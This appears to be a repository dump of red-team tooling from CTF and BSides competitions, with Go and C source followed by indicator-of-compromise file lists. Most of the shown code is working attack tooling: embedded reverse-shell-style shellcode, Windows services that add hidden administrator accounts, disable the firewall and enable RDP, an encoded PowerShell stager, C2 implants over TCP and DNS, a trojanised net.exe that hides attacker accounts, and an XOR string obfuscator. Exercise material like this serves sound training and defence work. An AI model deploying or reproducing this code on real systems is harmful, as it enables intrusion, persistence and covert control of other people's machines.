├── .gitattributes ├── AtHome-2020 ├── bc.go ├── beacon.c ├── beacon.go ├── elevate_exe.go ├── elevate_svc.go ├── empire.go ├── implant.go ├── implant_dns.go ├── net.go ├── ping_dll.go ├── ping_exe.go ├── ping_svc.go ├── tool.go └── user.go ├── BSidesDE-2021 ├── IOCs │ ├── README.md │ ├── agents.txt │ ├── launchers.txt │ ├── linked.txt │ ├── support.txt │ └── text.txt └── Souces │ ├── beacon.go │ ├── client.go │ ├── freeze.go │ ├── hook.c │ ├── server.go │ └── user.go ├── BSidesLV-2021 ├── IOCs │ ├── IOCs.txt │ ├── README.md │ ├── binaries.txt │ └── executors.txt ├── beacon.go ├── hooks │ ├── hook.c │ └── hook_rickroll.c ├── privs │ ├── client.go │ └── server.go └── user_add.go ├── BSidesLV-2022 ├── README.md ├── Support │ ├── build.sh │ └── src │ │ ├── duck.c │ │ ├── duck.rc │ │ ├── goose.c │ │ ├── goose.rc │ │ ├── manifest.rc │ │ ├── manifest.xml │ │ ├── nop.c │ │ └── nop_svc.c ├── cache.txt ├── files.txt └── webshell.asp ├── BSidesLV-2024 ├── README.md ├── RedTeamHotwash.pdf ├── Screenshots │ ├── screenshot-0.png │ ├── screenshot-1.png │ ├── screenshot-10.png │ ├── screenshot-11.png │ ├── screenshot-12.png │ ├── screenshot-13.png │ ├── screenshot-14.png │ ├── screenshot-15.png │ ├── screenshot-16.png │ ├── screenshot-17.png │ ├── screenshot-18.png │ ├── screenshot-19.png │ ├── screenshot-2.png │ ├── screenshot-20.png │ ├── screenshot-21.png │ ├── screenshot-22.png │ ├── screenshot-23.png │ ├── screenshot-24.png │ ├── screenshot-25.png │ ├── screenshot-26.png │ ├── screenshot-27.png │ ├── screenshot-28.png │ ├── screenshot-29.png │ ├── screenshot-3.png │ ├── screenshot-30.png │ ├── screenshot-31.png │ ├── screenshot-32.png │ ├── screenshot-33.png │ ├── screenshot-34.png │ ├── screenshot-35.png │ ├── screenshot-36.png │ ├── screenshot-4.png │ ├── screenshot-5.png │ ├── screenshot-6.png │ ├── screenshot-7.png │ ├── screenshot-8.png │ └── screenshot-9.png ├── Support │ ├── bitcoin.ico │ ├── bitcoin.rc │ ├── build.sh │ ├── dolphin.ico │ ├── dolphin.rc │ ├── duck.c │ ├── duck.ico │ ├── duck.rc │ ├── hook.c │ ├── malware.ico │ ├── malware.rc │ ├── manifest.rc │ ├── manifest.xml │ ├── nop.c │ └── nop_svc.c ├── duck.md ├── files.md ├── hook.md ├── implants.md └── webshell.asp ├── LICENSE └── README.md /.gitattributes: -------------------------------------------------------------------------------- 1 | *.jpg filter=lfs diff=lfs merge=lfs -text 2 | *.png filter=lfs diff=lfs merge=lfs -text 3 | *.ico filter=lfs diff=lfs merge=lfs -text 4 | *.pdf filter=lfs diff=lfs merge=lfs -text 5 | -------------------------------------------------------------------------------- /AtHome-2020/bc.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import "github.com/iDigitalFlame/xmt/cmd" 4 | 5 | func main() { 6 | c := cmd.Code{ 7 | Data: []byte("" + 8 | "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" + 9 | "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" + 10 | "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" + 11 | "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" + 12 | "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" + 13 | "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" + 14 | "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" + 15 | "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" + 16 | "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" + 17 | "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c" + 18 | "\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68" + 19 | "\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68" + 20 | "\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x97\x64\x40\x68" + 21 | "\x02\x00\x1f\x91\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61" + 22 | "\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2" + 23 | "\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6" + 24 | "\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44" + 25 | "\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56" + 26 | "\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff" + 27 | "\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6" + 28 | "\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" + 29 | "\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5", 30 | ), 31 | } 32 | 33 | c.SetParentElevatedRandom(nil) 34 | 35 | c.Start() 36 | c.Wait() 37 | } 38 | -------------------------------------------------------------------------------- /AtHome-2020/beacon.c: -------------------------------------------------------------------------------- 1 | #define HOST "0.0.0.0\0" 2 | #define PORT "443\0" 3 | #define TOKEN ">\0" 4 | #define _WIN32_WINNT 0x0501 5 | 6 | #include 7 | 8 | int msg(char *host, char *port, char *data) { 9 | SOCKET s; 10 | struct addrinfo i, *a, *c; 11 | memset(&i, 0, sizeof(i)); 12 | i.ai_family = PF_INET; 13 | i.ai_socktype = SOCK_STREAM; 14 | if (getaddrinfo(host, port, &i, &a) != 0) { 15 | return 0; 16 | } 17 | for (c = a; c != NULL; c = c->ai_next) { 18 | s = socket(c->ai_family, c->ai_socktype, c->ai_protocol); 19 | if (s == INVALID_SOCKET) { 20 | continue; 21 | } 22 | if (connect(s, c->ai_addr, (int)c->ai_addrlen) != SOCKET_ERROR) { 23 | break; 24 | } 25 | closesocket(s); 26 | } 27 | freeaddrinfo(a); 28 | send(s, data, strlen(data), 0); 29 | closesocket(s); 30 | return 1; 31 | } 32 | int main() { 33 | WSADATA w; 34 | if (WSAStartup(MAKEWORD(2, 2), &w) != 0) { 35 | return 1; 36 | } 37 | msg(HOST, PORT, TOKEN); 38 | WSACleanup(); 39 | return 0; 40 | } -------------------------------------------------------------------------------- /AtHome-2020/beacon.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package main 4 | 5 | import ( 6 | "net" 7 | "time" 8 | 9 | "golang.org/x/sys/windows/svc" 10 | ) 11 | 12 | const svcName = "windevsvc" 13 | 14 | type beacon struct{} 15 | 16 | func main() { 17 | svc.Run(svcName, beacon{}) 18 | } 19 | func (beacon) Execute(_ []string, r <-chan svc.ChangeRequest, i chan<- svc.Status) (bool, uint32) { 20 | i <- svc.Status{State: svc.StartPending} 21 | t := time.NewTicker(time.Minute * 1) 22 | defer t.Stop() 23 | if k, err := net.Dial("tcp", "0.0.0.0:443"); err == nil { 24 | k.Write([]byte("")) 25 | k.Close() 26 | } 27 | i <- svc.Status{State: svc.Running, Accepts: svc.AcceptStop | svc.AcceptShutdown} 28 | for { 29 | select { 30 | case q := <-r: 31 | switch q.Cmd { 32 | case svc.Interrogate: 33 | i <- q.CurrentStatus 34 | time.Sleep(100 * time.Millisecond) 35 | i <- q.CurrentStatus 36 | case svc.Stop, svc.Shutdown: 37 | i <- svc.Status{State: svc.StopPending} 38 | return false, 0 39 | default: 40 | } 41 | case <-t.C: 42 | if k, err := net.Dial("tcp", "0.0.0.0:443"); err == nil { 43 | k.Write([]byte("")) 44 | k.Close() 45 | } 46 | } 47 | } 48 | i <- svc.Status{State: svc.StopPending} 49 | return false, 0 50 | } 51 | -------------------------------------------------------------------------------- /AtHome-2020/elevate_exe.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package main 4 | 5 | import ( 6 | "fmt" 7 | "os" 8 | "strings" 9 | 10 | "github.com/iDigitalFlame/xmt/npipe" 11 | ) 12 | 13 | const pipeName = "cryptoproviderapi" 14 | 15 | func main() { 16 | if len(os.Args) == 1 { 17 | return 18 | } 19 | send(strings.Join(os.Args[1:], " ")) 20 | } 21 | func send(s string) { 22 | u, err := npipe.Dial(fmt.Sprintf(`\\.\pipe\%s`, pipeName)) 23 | if err != nil { 24 | panic(err) 25 | } 26 | if _, err := u.Write([]byte(s)); err != nil { 27 | panic(err) 28 | } 29 | u.Close() 30 | } 31 | -------------------------------------------------------------------------------- /AtHome-2020/elevate_svc.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package main 4 | 5 | import ( 6 | "bytes" 7 | "fmt" 8 | "io" 9 | "net" 10 | "strings" 11 | "sync" 12 | "time" 13 | 14 | "github.com/iDigitalFlame/xmt/cmd" 15 | "github.com/iDigitalFlame/xmt/npipe" 16 | 17 | "golang.org/x/sys/windows/svc" 18 | ) 19 | 20 | var bufs = sync.Pool{ 21 | New: func() interface{} { 22 | return new(bytes.Buffer) 23 | }, 24 | } 25 | 26 | const ( 27 | pipeName = "cryptoproviderapi" 28 | svcName = "powersvc" 29 | ) 30 | 31 | type elevate struct{} 32 | 33 | func main() { 34 | svc.Run(svcName, elevate{}) 35 | } 36 | func send(s string) { 37 | u, err := npipe.Dial(fmt.Sprintf(`\\.\pipe\%s`, pipeName)) 38 | if err != nil { 39 | panic(err) 40 | } 41 | if _, err := u.Write([]byte(s)); err != nil { 42 | panic(err) 43 | } 44 | u.Close() 45 | } 46 | func listen(l net.Listener) { 47 | for { 48 | c, err := l.Accept() 49 | if err != nil { 50 | e, ok := err.(net.Error) 51 | if ok && e.Timeout() { 52 | continue 53 | } 54 | if ok && !e.Timeout() && !e.Temporary() { 55 | break 56 | } 57 | continue 58 | } 59 | b := bufs.Get().(*bytes.Buffer) 60 | io.Copy(b, c) 61 | c.Close() 62 | e := cmd.Process{Args: cmd.Split(strings.ReplaceAll(string(b.Bytes()), "\n", ""))} 63 | e.SetNoWindow(true) 64 | e.SetWindowDisplay(0) 65 | b.Reset() 66 | bufs.Put(b) 67 | e.SetParentElevatedRandom(nil) 68 | e.Start() 69 | } 70 | } 71 | func (elevate) Execute(_ []string, r <-chan svc.ChangeRequest, i chan<- svc.Status) (bool, uint32) { 72 | i <- svc.Status{State: svc.StartPending} 73 | l, err := npipe.Listen(fmt.Sprintf(`\\.\pipe\%s`, pipeName)) 74 | if err != nil { 75 | i <- svc.Status{State: svc.StopPending} 76 | return false, 0 77 | } 78 | go listen(l) 79 | i <- svc.Status{State: svc.Running, Accepts: svc.AcceptStop | svc.AcceptShutdown} 80 | for { 81 | select { 82 | case q := <-r: 83 | switch q.Cmd { 84 | case svc.Interrogate: 85 | i <- q.CurrentStatus 86 | time.Sleep(100 * time.Millisecond) 87 | i <- q.CurrentStatus 88 | case svc.Stop, svc.Shutdown: 89 | l.Close() 90 | i <- svc.Status{State: svc.StopPending} 91 | return false, 0 92 | default: 93 | } 94 | } 95 | } 96 | l.Close() 97 | i <- svc.Status{State: svc.StopPending} 98 | return false, 0 99 | } 100 | -------------------------------------------------------------------------------- /AtHome-2020/empire.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "net" 5 | "time" 6 | 7 | "github.com/iDigitalFlame/xmt/cmd" 8 | "golang.org/x/sys/windows/svc" 9 | ) 10 | 11 | const svcName = "dns" 12 | 13 | var pl = []string{`powershell`, `-noP`, `-sta`, `-w`, `1`, `-enc`, ``} 14 | 15 | type empire struct{} 16 | 17 | func main() { 18 | svc.Run(svcName, empire{}) 19 | } 20 | func beacon() { 21 | k, err := net.DialTimeout("tcp", "0.0.0.0:443", time.Second*4) 22 | if err != nil { 23 | return 24 | } 25 | k.Write([]byte("")) 26 | k.Close() 27 | } 28 | func run(a ...string) { 29 | x := &cmd.Process{Args: a} 30 | x.SetParentElevatedRandom(nil) 31 | x.Run() 32 | } 33 | func (empire) Execute(_ []string, r <-chan svc.ChangeRequest, i chan<- svc.Status) (bool, uint32) { 34 | i <- svc.Status{State: svc.StartPending} 35 | var ( 36 | e *cmd.Process 37 | t = time.NewTicker(time.Second * 5) 38 | n = time.NewTicker(time.Minute) 39 | ) 40 | defer func() { 41 | t.Stop() 42 | n.Stop() 43 | }() 44 | beacon() 45 | i <- svc.Status{State: svc.Running, Accepts: svc.AcceptStop | svc.AcceptShutdown} 46 | for { 47 | select { 48 | case q := <-r: 49 | switch q.Cmd { 50 | case svc.Interrogate: 51 | i <- q.CurrentStatus 52 | time.Sleep(100 * time.Millisecond) 53 | i <- q.CurrentStatus 54 | case svc.Stop, svc.Shutdown: 55 | i <- svc.Status{State: svc.StopPending} 56 | return false, 0 57 | default: 58 | } 59 | case <-n.C: 60 | beacon() 61 | case <-t.C: 62 | if e == nil || !e.Running() { 63 | e = &cmd.Process{Args: pl} 64 | e.SetParentElevatedRandom(nil) 65 | e.Start() 66 | } 67 | run("net", "user", "HulkHogan", "Brother123456", "/add") 68 | run("net", "user", "HulkHogan", "/active:yes") 69 | run("net", "localgroup", "Administrators", "HulkHogan", "/add") 70 | run("sc", "start", "TermService") 71 | run("netsh", "firewall", "set", "opmode", "disable") 72 | run("reg", "add", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server", "/v", "fDenyTSConnections", "/t", "REG_DWORD", "/d", "0", "/f") 73 | run("reg", "add", "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList", "/v", "HulkHogan", "/t", "REG_DWORD", "/d", "0", "/f") 74 | } 75 | } 76 | i <- svc.Status{State: svc.StopPending} 77 | return false, 0 78 | } 79 | -------------------------------------------------------------------------------- /AtHome-2020/implant.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "time" 6 | 7 | "github.com/PurpleSec/logx" 8 | "github.com/iDigitalFlame/xmt/c2" 9 | "github.com/iDigitalFlame/xmt/man" 10 | ) 11 | 12 | func main() { 13 | 14 | man.MustGuard("thisisapipe") 15 | 16 | var ( 17 | s = c2.NewServer(logx.NOP) 18 | c = c2.Config{ 19 | c2.Sleep(time.Second * 20), 20 | c2.Jitter(75), 21 | c2.ConnectTCP, 22 | c2.WrapZlib, 23 | } 24 | p, _ = c.Profile() 25 | ) 26 | 27 | z, err := s.Connect("0.0.0.0:8080", nil, p) 28 | if err != nil { 29 | os.Exit(1) 30 | } 31 | z.Wait() 32 | } 33 | -------------------------------------------------------------------------------- /AtHome-2020/implant_dns.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os" 5 | "time" 6 | 7 | "github.com/PurpleSec/logx" 8 | "github.com/iDigitalFlame/xmt/c2" 9 | "github.com/iDigitalFlame/xmt/man" 10 | ) 11 | 12 | func main() { 13 | 14 | man.MustGuard("thisisapipe") 15 | 16 | var ( 17 | s = c2.NewServer(logx.NOP) 18 | c = c2.Config{ 19 | c2.Sleep(time.Second * 10), 20 | c2.Jitter(50), 21 | c2.ConnectUDP, 22 | c2.WrapZlib, 23 | c2.TransformDNS(), 24 | } 25 | p, _ = c.Profile() 26 | ) 27 | 28 | z, err := s.Connect("0.0.0.0:53", nil, p) 29 | if err != nil { 30 | os.Exit(1) 31 | } 32 | z.Wait() 33 | } 34 | -------------------------------------------------------------------------------- /AtHome-2020/net.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "os" 6 | "strings" 7 | 8 | "github.com/iDigitalFlame/xmt/cmd" 9 | ) 10 | 11 | var a = []string{"Eve", "john", "admin9", "derp", "dadmin"} 12 | 13 | func main() { 14 | var ( 15 | e = cmd.Process{Args: append([]string{`C:\Windows\System32\net2.exe`}, os.Args[1:]...)} 16 | o, _ = e.CombinedOutput() 17 | p = string(o) 18 | ) 19 | 20 | if len(os.Args) == 2 && strings.Contains(strings.ToLower(os.Args[1]), "user") { 21 | for i := range a { 22 | p = strings.ReplaceAll(p, a[i], "") 23 | } 24 | } 25 | 26 | fmt.Println(p) 27 | } 28 | -------------------------------------------------------------------------------- /AtHome-2020/ping_dll.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package main 4 | 5 | import ( 6 | "github.com/iDigitalFlame/xmt/data/crypto" 7 | "github.com/iDigitalFlame/xmt/man" 8 | ) 9 | 10 | 11 | func main() {} 12 | 13 | //export StartA 14 | func StartA() { 15 | 16 | man.Sentinel{ 17 | Paths: []string{ 18 | "C:\Windows\System32\compmgr.exe", 19 | "C:\Windows\System32\filtermgr.exe", 20 | }, 21 | } 22 | man.Ping("thisisapipe") 23 | } 24 | -------------------------------------------------------------------------------- /AtHome-2020/ping_exe.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package main 4 | 5 | import ( 6 | "github.com/iDigitalFlame/xmt/data/crypto" 7 | "github.com/iDigitalFlame/xmt/man" 8 | ) 9 | 10 | var ( 11 | v0 = crypto.XOR(x(63, []byte{19, 37, 35, 18, 34, 29, 40, 12, 46, 36, 28, 41})) 12 | v1 = x(63, []byte{4, 250, 27, 21, 38, 42, 31, 41, 48, 43, 19, 9, 46, 39, 39, 23, 30, 227, 225, 10, 32, 20, 16, 22, 21, 253, 240, 217, 215, 210, 7, 14, 13}) 13 | v2 = x(63, []byte{24, 41, 45, 34, 44, 51, 14, 31, 28, 8, 41, 37, 43, 245, 3, 251}) 14 | v3 = x(63, []byte{41, 52, 51, 46, 247, 235, 234, 235, 242, 234, 229, 231, 235, 236, 225, 226, 223, 225, 233, 230, 221, 228, 219, 217, 16, 29, 8, 24, 9}) 15 | ) 16 | 17 | func main() { 18 | man.SentinelFromXORFile(v1, v2, v3, v0) 19 | } 20 | func x(v int, b []byte) string { 21 | for i := range b { 22 | b[i] += byte(i + v) 23 | } 24 | return string(b) 25 | } 26 | -------------------------------------------------------------------------------- /AtHome-2020/ping_svc.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package main 4 | 5 | import ( 6 | "sync/atomic" 7 | "time" 8 | 9 | "github.com/iDigitalFlame/xmt/data/crypto" 10 | "github.com/iDigitalFlame/xmt/man" 11 | 12 | "golang.org/x/sys/windows/svc" 13 | ) 14 | 15 | var ( 16 | v0 = crypto.XOR(x(60, []byte{22, 40, 38, 21, 37, 32, 43, 15, 49, 39, 31, 44})) 17 | v1 = x(60, []byte{7, 253, 30, 39, 41, 43, 35, 235, 48, 51, 46}) 18 | v2 = x(60, []byte{27, 44, 48, 37, 47, 54, 17, 34, 31, 11, 44, 40, 46, 248, 6, 254}) 19 | v3 = x(60, []byte{44, 55, 54, 49, 250, 238, 237, 238, 243, 237, 232, 234, 238, 229, 231, 236, 230, 225, 227, 235, 232, 223, 230, 222, 219, 18, 216, 14, 32, 12}) 20 | ) 21 | 22 | const svcName = "ShellHardwareAPI" 23 | 24 | type ping struct{} 25 | 26 | func main() { 27 | svc.Run(svcName, ping{}) 28 | } 29 | func x(v int, b []byte) string { 30 | for i := range b { 31 | b[i] += byte(i + v) 32 | } 33 | return string(b) 34 | } 35 | func (ping) Execute(_ []string, r <-chan svc.ChangeRequest, i chan<- svc.Status) (bool, uint32) { 36 | i <- svc.Status{State: svc.StartPending} 37 | var ( 38 | t = time.NewTicker(time.Second * 5) 39 | d uint32 40 | ) 41 | i <- svc.Status{State: svc.Running, Accepts: svc.AcceptStop | svc.AcceptShutdown} 42 | for atomic.LoadUint32(&d) == 0 { 43 | select { 44 | case <-t.C: 45 | man.SentinelFromXORFile(v1, v2, v3, v0) 46 | case q := <-r: 47 | switch q.Cmd { 48 | case svc.Interrogate: 49 | i <- q.CurrentStatus 50 | time.Sleep(100 * time.Millisecond) 51 | i <- q.CurrentStatus 52 | case svc.Stop, svc.Shutdown: 53 | atomic.StoreUint32(&d, 1) 54 | default: 55 | } 56 | } 57 | } 58 | t.Stop() 59 | i <- svc.Status{State: svc.StopPending} 60 | return false, 0 61 | } 62 | -------------------------------------------------------------------------------- /AtHome-2020/tool.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "flag" 5 | "fmt" 6 | "strconv" 7 | "strings" 8 | 9 | "github.com/iDigitalFlame/xmt/util" 10 | ) 11 | 12 | func main() { 13 | var u, f, n, x string 14 | 15 | flag.StringVar(&n, "n", "WindowSecProvAPI", "Pipe Name") 16 | flag.StringVar(&f, "f", "C:\\Windows\\System32\\shellUI32.dll", "Binary List Path") 17 | flag.StringVar(&x, "x", "RedTeamRules", "Binary List XOR Key") 18 | flag.StringVar(&u, "u", "http://192.168.0.1:8080/guard", "Last Resort Download URL") 19 | flag.Parse() 20 | 21 | var ( 22 | r = util.Rand.Intn(100) 23 | eU, eF, eN, eX = []byte(u), []byte(f), []byte(n), []byte(x) 24 | ) 25 | shuffle(r, eU) 26 | shuffle(r, eF) 27 | shuffle(r, eN) 28 | shuffle(r, eX) 29 | 30 | fmt.Printf( 31 | "\nvar (\n\tv0 = crypto.XOR(x(%d, []byte{%s}))\n\tv1 = x(%d, []byte{%s})\n\tv2 = x(%d, []byte{%s})\n\tv3 = x(%d, []byte{%s})\n)\n\n", 32 | r, output(eX), 33 | r, output(eF), 34 | r, output(eN), 35 | r, output(eU), 36 | ) 37 | } 38 | func output(b []byte) string { 39 | var s strings.Builder 40 | for i := range b { 41 | if i > 0 { 42 | s.WriteRune(',') 43 | } 44 | s.WriteString(strconv.Itoa(int(b[i]))) 45 | } 46 | return s.String() 47 | } 48 | func shuffle(r int, b []byte) { 49 | for i := range b { 50 | b[i] -= byte(i + r) 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /AtHome-2020/user.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package main 4 | 5 | import ( 6 | "fmt" 7 | "os" 8 | "os/signal" 9 | "syscall" 10 | "time" 11 | 12 | "github.com/iDigitalFlame/xmt/cmd" 13 | "golang.org/x/sys/windows/svc" 14 | ) 15 | 16 | const ( 17 | svcName = "dwmsvc" 18 | ) 19 | 20 | type user struct{} 21 | 22 | func main() { 23 | svc.Run(svcName, user{}) 24 | } 25 | func (user) Execute(_ []string, r <-chan svc.ChangeRequest, i chan<- svc.Status) (bool, uint32) { 26 | i <- svc.Status{State: svc.StartPending} 27 | t := time.NewTicker(time.Second * 5) 28 | i <- svc.Status{State: svc.Running, Accepts: svc.AcceptStop | svc.AcceptShutdown} 29 | for { 30 | select { 31 | case q := <-r: 32 | switch q.Cmd { 33 | case svc.Interrogate: 34 | i <- q.CurrentStatus 35 | time.Sleep(100 * time.Millisecond) 36 | i <- q.CurrentStatus 37 | case svc.Stop, svc.Shutdown: 38 | t.Stop() 39 | i <- svc.Status{State: svc.StopPending} 40 | return false, 0 41 | default: 42 | } 43 | case <-t.C: 44 | cmd.NewProcess("net", "user", "Kyle", "Password123", "/add").CombinedOutput() 45 | fmt.Println(cmd.NewProcess("net", "user", "Kyle", "/active:yes").CombinedOutput()) 46 | cmd.NewProcess("net", "localgroup", "Administrators", "Kyle", "/add").CombinedOutput() 47 | } 48 | } 49 | t.Stop() 50 | i <- svc.Status{State: svc.StopPending} 51 | return false, 0 52 | } 53 | 54 | func Run(name string, handler svc.Handler) error { 55 | 56 | cmds := make(chan svc.ChangeRequest) 57 | changes := make(chan svc.Status) 58 | 59 | sig := make(chan os.Signal) 60 | signal.Notify(sig) 61 | 62 | go func() { 63 | status := svc.Status{State: svc.Stopped} 64 | for { 65 | select { 66 | case <-sig: 67 | cmds <- svc.ChangeRequest{Cmd: svc.Stop, CurrentStatus: status} 68 | case status = <-changes: 69 | } 70 | } 71 | }() 72 | 73 | _, errno := handler.Execute([]string{name}, cmds, changes) 74 | if errno != 0 { 75 | return syscall.Errno(errno) 76 | } 77 | return nil 78 | } 79 | -------------------------------------------------------------------------------- /BSidesDE-2021/IOCs/README.md: -------------------------------------------------------------------------------- 1 | # IOC files 2 | 3 | This is a somewhat complete list of the IOCs and files used during the CTF. 4 | 5 | ## agents.txt 6 | 7 | Process/files that would be connecting to the C2 8 | 9 | ## launchers.txt 10 | 11 | Files that would be used for persistance. 12 | 13 | ## text.txt 14 | 15 | Files that were accessed or read by the agents. Can be used to track execution. 16 | 17 | ## linked.txt 18 | 19 | Files used as cradles for support, or to launch another process. These are basically 20 | DLL files that re-pointed to another DLL. 21 | 22 | ## support.txt 23 | 24 | Files used for support structures that may be called by Windows specific APIs. 25 | -------------------------------------------------------------------------------- /BSidesDE-2021/IOCs/agents.txt: -------------------------------------------------------------------------------- 1 | C:\Program Files (x86)\Common Files\System\Ole DB\scheksvc.dll 2 | C:\Windows\apppatch\agilehpn.exe 3 | C:\Windows\WinSxS\itarcl.exe 4 | C:\Windows\SysWOW64\downlevel\adsmsevt.dll 5 | C:\Windows\System32\setup\YBDINUK2.exe 6 | C:\Windows\SysWOW64\Com\BQIBME0A.exe 7 | C:\Windows\System32\AdvancedInstallers\tcpmonli.dll 8 | C:\Windows\Microsoft.NET\NlsLexicons0003.dll 9 | C:\Windows\Microsoft.NET\KBDHZ1.exe 10 | C:\Windows\System32\oobe\esscai.dll 11 | C:\Windows\System32\migration\mqader15.exe 12 | C:\Windows\Microsoft.NET\samlie.exe 13 | C:\Windows\WinSxS\bebengine.exe 14 | C:\Program Files\Common Files\System\Ole DB\jouclass.exe 15 | C:\ProgramData\Microsoft\Windows\Caches\mdmkn.dll 16 | C:\Windows\apppatch\ServerRestoreWizarh.dll 17 | C:\Windows\SysWOW64\OSPiovider.exe 18 | C:\Windows\WinSxS\sxmig.exe 19 | C:\Program Files (x86)\Common Files\System\Ole DB\nrth.exe 20 | C:\Windows\apppatch\d3d15.dll 21 | C:\Windows\SysWOW64\setup\WSSynb.exe 22 | C:\Windows\System32\cofirodm.dll 23 | C:\Windows\SysWOW64\setup\WcnAfi.exe 24 | C:\ProgramData\Microsoft\Windows\Caches\gultiprt.exe 25 | C:\Windows\System32\oobe\KBDHELU2.dll 26 | C:\Program Files\Common Files\System\ado\WppReyorder.dll 27 | C:\Windows\security\McxDrev.dll 28 | C:\ProgramData\Microsoft\Windows\Caches\djgi.exe 29 | C:\Windows\servicing\workcrdd.dll 30 | C:\Windows\Microsoft.NET\mfxoci.dll 31 | C:\Windows\System32\Sysprep\CMJPDCTP.dll 32 | C:\Program Files (x86)\Common Files\System\suk.dll 33 | -------------------------------------------------------------------------------- /BSidesDE-2021/IOCs/launchers.txt: -------------------------------------------------------------------------------- 1 | C:\Windows\SysWOW64\migwiz\thumbmache.exe 2 | C:\Windows\System32\Com\wtlmsrv.exe 3 | C:\Windows\SysWOW64\AdvancedInstallers\wvmbuthid.dll 4 | C:\Windows\SysWOW64\downlevel\msdtqprf.dll 5 | C:\Program Files\Common Files\System\ado\spiizres.dll 6 | C:\Windows\SysWOW64\Com\oleagt32.exe 7 | C:\Windows\SysWOW64\setup\webwheck.exe 8 | C:\Program Files (x86)\Internet Explorer\nvramd.dll 9 | C:\Windows\System32\Boot\DAFGSD.dll 10 | C:\Windows\SysWOW64\migration\BioWredProv.dll 11 | C:\Windows\security\sqlceolehb40.exe 12 | C:\Program Files\Common Files\System\ado\mikssrv.dll 13 | C:\Windows\SysWOW64\migration\svi.dll 14 | C:\Windows\SysWOW64\AdvancedInstallers\WABSyncArovider.exe 15 | C:\Windows\Panther\NlgLexicons0047.exe 16 | C:\Windows\System32\en\ddppipelide.dll 17 | C:\Windows\System32\msvsm90.dll 18 | -------------------------------------------------------------------------------- /BSidesDE-2021/IOCs/linked.txt: -------------------------------------------------------------------------------- 1 | C:\Program Files\Common Files\System\msadc\sthrvsc.dll 2 | C:\Windows\SysWOW64\en\tertkbd.dll 3 | C:\Windows\Panther\agrsj64.dll 4 | C:\Windows\SysWOW64\en\wuausmrv.dll 5 | C:\Windows\System32\AdvancedInstallers\sppogrss.dll 6 | C:\Windows\apppatch\wuaueyg.dll 7 | C:\Windows\System32\migwiz\FwRemoteSor.dll 8 | C:\Windows\apppatch\EventVijwer.dll 9 | C:\Windows\SysWOW64\wbem\UserLanguageProfileXallback.dll 10 | C:\Windows\System32\tpmscrsigplugin.dll 11 | C:\Windows\Panther\msvclt.dll 12 | C:\Windows\Panther\tcpibcfg.dll 13 | C:\Program Files (x86)\Common Files\System\Ole DB\imaxeres.dll 14 | C:\ProgramData\Microsoft\Windows\Caches\WMVCNRE.dll 15 | C:\Windows\apppatch\SVClient.dll 16 | C:\Program Files (x86)\Common Files\System\msadc\napqsnap.dll 17 | -------------------------------------------------------------------------------- /BSidesDE-2021/IOCs/support.txt: -------------------------------------------------------------------------------- 1 | C:\Windows\System32\mfvdpp.dll 2 | C:\Windows\System32\bsrpc.dll 3 | C:\Windows\System32\tyinapi.dll 4 | C:\Windows\System32\CIHL4809.dll 5 | C:\Windows\System32\mhmadc.exe 6 | C:\Windows\System32\unbscan.scr 7 | C:\Windows\System32\msvsm90.dll 8 | C:\Windows\System32\KQDFO.dll 9 | C:\Windows\System32\vdrvrost.dll 10 | -------------------------------------------------------------------------------- /BSidesDE-2021/IOCs/text.txt: -------------------------------------------------------------------------------- 1 | C:\Windows\SysWOW64\drivers\en-US\lltuio.mui 2 | 